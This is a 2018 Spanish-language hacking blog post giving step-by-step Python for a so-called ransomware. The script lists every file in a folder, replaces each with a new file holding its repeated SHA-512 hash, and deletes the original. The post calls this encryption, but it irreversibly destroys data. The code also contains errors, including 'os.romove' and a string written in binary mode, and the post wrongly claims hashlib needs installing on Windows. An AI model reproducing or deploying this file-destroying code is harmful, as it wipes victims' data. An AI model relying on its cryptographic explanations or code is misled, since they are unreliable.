Creando un Ransomware en phyton. #HackingPills - Seguridad de la información

Breaking

Webs Amigas

martes, 4 de septiembre de 2018

Creando un Ransomware en phyton. #HackingPills



Seguir en twitter HackingPills: @Sh4Rk_0 
Suscribirse en youtube: Hackingpills
Para mas articulos, tutoriales y cursos visita : https://hackingpills.blogspot.com/

En este post vengo con algo que de seguro a muchos les gustara, hablo de crear nuestro propio ransomware en python y poder entender como funciona. Este tipo de ataque esta muy de moda en estos tiempos y es por eso que decidí hacer este post.

Antes de comenzar debo decir que este ransomware funciona tanto para Windows al igual que para linux y mac. En mi caso lo haré para linux, en caso de que lo quieran correr en win solo deben instalar la librería hashlib y cambiar algunos valores en el código. 

Primero importamos las siguientes librerías y crear una variable con la ruta que deseamos cifrar.

import hashlib
import os

path = '/root/Desktop/test'


Luego creamos un for para listar todos los archivos que se encuentran en esa ruta, y luego leerlos uno a uno.

for archivos in os.listdir(path):
    os.chdir(path)
    with open(archivos, 'rb') as r:
        files = r.read()
        encrypt = hashlib.sha512(files).hexdigest()
        new_file = '(Archivo-cifrado)'+os.path.basename(archivos)

Hasta ahora lo que hicimos fue leer todos los archivos de esa ruta, luego en la variable encrypt declaramos el tipo de hash que utilizaremos para cifrar los archivos leídos los cuales se encuentran en files. Luego se crea un nuevo file con el hash de ese archivo y con el nombre "archivo-cifrado" mas el nombre de el archivo(el archivo el cual le pertenece ese hash).

Por ultimo escribimos el hash en el nuevo archivo.

        with open(new_file, 'wb') as n:
            n.write(encrypt*0xFF)
            n.close()
            n.close()
            os.romove(archivos)

Listo una vez escrito el hash en el archivo borramos el original y solo quedara el archivo cifrado. Una vez ejecutemos el script cifrara todos los archivos en esa ruta ya sean .txt, videos o cualquier otro tipo de archivo. Si tenemos un folder en esa ruta nos dará un error pero podemos cambiar eso editando el código. Para mi próximo post puede que explique como solucionarlo.


Espero que les haya sido de ayuda y no olviden compartir y suscribirse.

Seguir en twitter HackingPills: @Sh4Rk_0 
Suscribirse en youtube: Hackingpills 


código completo en Github.

https://github.com/Sh4rk0-666/Ramsonware-DarkShark
Fuente: https://hackingpills.blogspot.com/

No hay comentarios:

Publicar un comentario